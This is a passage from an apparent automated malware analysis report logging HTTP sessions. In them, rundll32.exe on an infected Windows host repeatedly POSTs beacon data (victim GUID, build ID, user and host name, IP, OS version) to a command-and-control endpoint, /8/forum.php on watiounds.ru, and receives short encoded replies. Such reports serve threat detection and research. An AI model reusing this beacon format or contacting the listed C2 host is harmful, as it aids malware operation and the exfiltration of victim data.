                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:54.276946068 CEST | 109 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:54 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 48 47 54 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cHGTSARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          67 | 192.168.2.22 | 49232 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:21:54.622772932 CEST | 110 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:54.754401922 CEST | 110 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:54 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 46 4b 50 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cFKPUARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          68 | 192.168.2.22 | 49233 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:21:55.070740938 CEST | 111 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:55.199376106 CEST | 111 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:55 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4b 4d 4e 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cKMNPARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          69 | 192.168.2.22 | 49234 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:21:55.527024984 CEST | 112 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:55.652246952 CEST | 113 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:55 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 48 53 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCHSXARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          7 | 192.168.2.22 | 49172 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:18:02.661334038 CEST | 20 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:18:02.786098957 CEST | 21 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:18:02 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4a 4d 4e 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cJMNQARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          70 | 192.168.2.22 | 49235 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:21:55.977261066 CEST | 113 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:56.099227905 CEST | 114 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:56 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 46 47 54 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cFGTUARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          71 | 192.168.2.22 | 49236 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:21:56.436139107 CEST | 114 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:56.559838057 CEST | 115 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:56 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 46 43 58 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cFCXUARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          72 | 192.168.2.22 | 49237 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:21:56.886367083 CEST | 116 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:57.010179996 CEST | 116 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:56 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4b 4d 4e 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cKMNPARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          73 | 192.168.2.22 | 49238 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:21:57.333587885 CEST | 117 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:57.462786913 CEST | 117 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:57 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 48 4e 4d 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cHNMSARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          74 | 192.168.2.22 | 49239 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:21:57.797476053 CEST | 118 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:57.925854921 CEST | 118 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:57 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4e 4b 50 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cNKPMARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          75 | 192.168.2.22 | 49240 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:21:58.255289078 CEST | 119 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:58.384263992 CEST | 119 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:58 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 56 46 55 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cVFUEARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          76 | 192.168.2.22 | 49241 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:21:58.723728895 CEST | 120 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:58.854806900 CEST | 120 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:58 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4e 43 58 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cNCXMARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          77 | 192.168.2.22 | 49242 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:21:59.171947956 CEST | 121 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:59.295538902 CEST | 122 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:59 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4a 4e 4d 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cJNMQARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          78 | 192.168.2.22 | 49243 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:21:59.606086016 CEST | 122 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:59.732573032 CEST | 123 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:59 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4b 43 58 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cKCXPARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          79 | 192.168.2.22 | 49244 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:00.045331955 CEST | 123 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:00.173826933 CEST | 124 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:00 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 5a 41 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZZAAARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          8 | 192.168.2.22 | 49173 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:18:17.878882885 CEST | 23 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:18:18.001451015 CEST | 23 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:18:17 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4b 43 58 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cKCXPARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          80 | 192.168.2.22 | 49245 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:00.490439892 CEST | 124 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:00.612082958 CEST | 125 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:00 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 4d 4e 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCMNXARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          81 | 192.168.2.22 | 49246 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:00.941956043 CEST | 126 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:01.067533970 CEST | 126 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:01 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 54 48 53 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cTHSGARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          82 | 192.168.2.22 | 49247 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
